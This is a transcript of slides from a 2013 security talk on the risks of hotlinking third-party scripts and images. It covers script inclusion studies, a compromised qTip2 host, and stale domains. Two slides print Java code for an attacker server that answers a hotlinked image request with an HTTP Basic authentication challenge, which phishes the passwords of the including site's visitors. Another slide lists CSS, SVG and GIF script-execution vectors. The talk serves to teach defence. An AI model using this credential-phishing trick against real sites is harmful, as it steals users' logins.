Hotlinking is Too Hot for Comfort

1,741 views

Published on

Presentation given at GeekMeet in Stockholm, January 2013. Covers the risks with hotlinking JavaScript and images in your websites.

1 Comment
1 Like
Statistics
Notes
No Downloads
Views
Total views
1,741
On SlideShare
0
From Embeds
0
Number of Embeds
30
Actions
Shares
0
Downloads
6
Comments
1
Likes
1
Embeds 0
No embeds

No notes for slide

Hotlinking is Too Hot for Comfort

  1. 1. Hotlinking is Too Hot for Comfort @johnwilander, GeekMeet Stockholm 2013
  2. 2. Hotlinking ==<img src="http://3rdparty.net"><script src="http://3rdparty.net"></script> @johnwilander
  3. 3. The Paper."You Are What You Include"by Nikiforakis et alhttp://seclab.cs.ucsb.edu/media/uploads/papers/jsinclusions.pdf @johnwilander
  4. 4. Crawled• Alexa Top 10,000• Up to 500 pages per domain• 3,000,000+ pages in total @johnwilander
  5. 5. @johnwilander
  6. 6. Sites typically hotlink JavaScriptfrom 5-15 remote hosts @johnwilander
  7. 7. If I can run a script onyour site or app, what can I do? @johnwilander
  8. 8. Browser Exploitation Framework http://beefproject.com/ @johnwilander
  9. 9. So, who is able to run scripts on your site? @johnwilander
  10. 10. % of Service .js Top AlexaWeb analytics www.google-analytics.com/ga.js 68.37% pagead2.googlesyndication.com/Dynamic Ads 23.87% pagead/show_ads.jsWeb analytics www.google-analytics.com/urchin.js 17.32%Social Networking connect.facebook.net/en_us/all.js 16.82%Social Networking platform.twitter.com/widgets.js 13.87%Social Networking & Web analytics s7.addthis.com/js/250/addthis_widget.js 12.68%Web analytics & Tracking edge.quantserve.com/quant.js 11.98%Market Research b.scorecardresearch.com/beacon.js 10.45%Google Helper Functions www.google.com/jsapi 10.14%Web analytics ssl.google-analytics.com/ga.js 10.12% @johnwilander
  11. 11. % of Service .js Top AlexaWeb analytics www.google-analytics.com/ga.js 68.37% pagead2.googlesyndication.com/Dynamic Ads 23.87% pagead/show_ads.jsWeb analytics www.google-analytics.com/urchin.js 17.32%Social Networking connect.facebook.net/en_us/all.js 16.82%Social Networking platform.twitter.com/widgets.js 13.87%Social Networking & Web analytics s7.addthis.com/js/250/addthis_widget.js 12.68%Web analytics & Tracking edge.quantserve.com/quant.js 11.98%Market Research b.scorecardresearch.com/beacon.js 10.45%Google Helper www.google.com/jsapi 10.14%Web analytics ssl.google-analytics.com/ga.js 10.12% @johnwilander
  12. 12. % of Service .js Top AlexaWeb analytics www.google-analytics.com/ga.js 68.37% pagead2.googlesyndication.com/Dynamic Ads 23.87% pagead/show_ads.jsWeb analytics www.google-analytics.com/urchin.js 17.32%ga.js and urchin.js are two different versions ofSocial Networking connect.facebook.net/en_us/all.js 16.82%Social Networking platform.twitter.com/widgets.js 13.87%Google Analytics => probably not on the same site.Social Networking & Web analytics s7.addthis.com/js/250/addthis_widget.js 12.68%Web analytics & Tracking edge.quantserve.com/quant.js 11.98%68.37+17.32 ≈ 85% ofb.scorecardresearch.com/beacon.jsMarket Research Alexa Top 10,000 10.45%Google Helper www.google.com/jsapi 10.14%Please dont be evil, Google.Web analytics ssl.google-analytics.com/ga.js 10.12% @johnwilander
  13. 13. @johnwilander
  14. 14. 2011-12-08 there was an issue reported https://github.com/Craga89/qTip2/issues/286 @johnwilander
  15. 15. "sends your browser agent and another piece of info" @johnwilander
  16. 16. "old Wordpress install … security vulnerability""infected nearly all JS files on my site" @johnwilander
  17. 17. "The offending scripts have been removed as well as the Wordpress blog""cronjob setup that checks for changes" "Closed" @johnwilander
  18. 18. Comment "it downloads some other exploits" @johnwilander
  19. 19. One month later …https://github.com/Craga89/qTip2/issues/286 @johnwilander
  20. 20. "issue is still present" @johnwilander
  21. 21. "Looks like the security hole wasntplugged after all" "Please … do not hotlink" "Reopened" @johnwilander
  22. 22. "Ive disabled the Wordpress blogon my site" "Closed" @johnwilander
  23. 23. Questions on qtip Hack• How many end user PCs were trojanized?• How many passwords stolen?• How many credit card numbers stolen?• How many internet bank logins remote controlled? @johnwilander
  24. 24. Stale Hotlink Domains @johnwilander
  25. 25. Alexa Top 1,000,000 Hotlinks … Alexa Top 10,000 @johnwilander
  26. 26. Alexa Top 1,000,000 Other domains Hotlinks Alexa Top 10,000 @johnwilander
  27. 27. Alexa Top 1,000,000 Other domains Stale domains, open for purchase Alexa Top 10,000 @johnwilander
  28. 28. The Stale Numbers• +3,000,000 pages crawled• 4,225 hotlinked domains outside Alexa Top 1,000,000• 50 domains stale, i.e. no longer registered @johnwilander
  29. 29. Nick et al purchased two of those stale domains @johnwilander
  30. 30. Stale domains hbotapadmin.com blogtools.usAlexa Top 10,000 hbo.com goldprice.org @johnwilander
  31. 31. Stale domains hbotapadmin.com blogtools.us …Alexa Top 10,000 23 less popular sites hbo.com goldprice.org @johnwilander
  32. 32. blogtools hbotapadmin .us .comVisits (15 days) 80,466 4,615 Stale domains hbotapadmin.com blogtools.us … Alexa Top 10,000 23 less popular sites hbo.com goldprice.org @johnwilander
  33. 33. blogtools hbotapadmin .us .com Visits (15 days) 80,466 4,615 Stale domains hbotapadmin.comIncluding domains 24 4 blogtools.us Including pages 84 41 … Alexa Top 10,000 23 less popular sites hbo.com goldprice.org @johnwilander
  34. 34. The Case of theUnauthorized Image @johnwilander
  35. 35. ”Hotlinked images,can they bite me too?” @johnwilander
  36. 36. OK, this might be bad<script src="http://3rdparty.net"></script><img src="http://3rdparty.net"> But this? @johnwilander
  37. 37. @johnwilander
  38. 38. What if Meetup allowedprofile images to be hotlinked? @johnwilander
  39. 39. Meanwhile, at theAttacker’s Server … @johnwilander
  40. 40. Including images typically looks like thisin a web app project: src/main/webapp/ css/… img/thumb_john.jpg js/… html/…But an attacker could instead resolvethat image URL in code, like this … @johnwilander
  41. 41. private static final String IMG_PATH = "/img/thumb_john.jpg";private boolean returnUnauthorized = false;@GET@Path("/thumb_john.jpg")@Produces("image/jpg")public Response getEvilImage(@Context ServletContext context) { if (returnUnauthorized) { return Response.status(Response.Status.UNAUTHORIZED) .header("WWW-Authenticate", "Basic").build(); } else { try { BufferedImage image = ImageIO.read(context.getResourceAsStream(IMG_PATH)); ByteArrayOutputStream outputStream = new ByteArrayOutputStream(); ImageIO.write(image, "jpg", outputStream); byte[] imageData = outputStream.toByteArray(); return Response.ok(imageData).build(); } catch (IOException e) { e.printStackTrace(); return Response.serverError().build(); } }} @johnwilander
  42. 42. private static final String IMG_PATH = "/images/thumb_john.jpg";private boolean returnUnauthorized = false;@GET@Path("/thumb_john.jpg")@Produces("image/jpg")public Response getEvilImage(@Context ServletContext context) { if (returnUnauthorized) { return Response.status(Response.Status.UNAUTHORIZED) .header("WWW-Authenticate", "Basic").build(); } else { try { BufferedImage image = … adding some nasty, alternate behavior. ImageIO.read(context.getResourceAsStream(IMG_PATH)); ByteArrayOutputStream outputStream = new ByteArrayOutputStream(); ImageIO.write(image, "jpg", outputStream); byte[] imageData = outputStream.toByteArray(); return Response.ok(imageData).build(); } catch (IOException e) { e.printStackTrace(); return Response.serverError().build(); } }} @johnwilander
  43. 43. @johnwilander
  44. 44. Now what will John Doe enter? @johnwilander
  45. 45. Some more nails for the coffin …• CSS files can execute JavaScript (expressions in IE6-7 and XBL in Firefox)• SVGs can execute JavaScript• Gif files can be edited to become executable JavaScript and HTML @johnwilander

×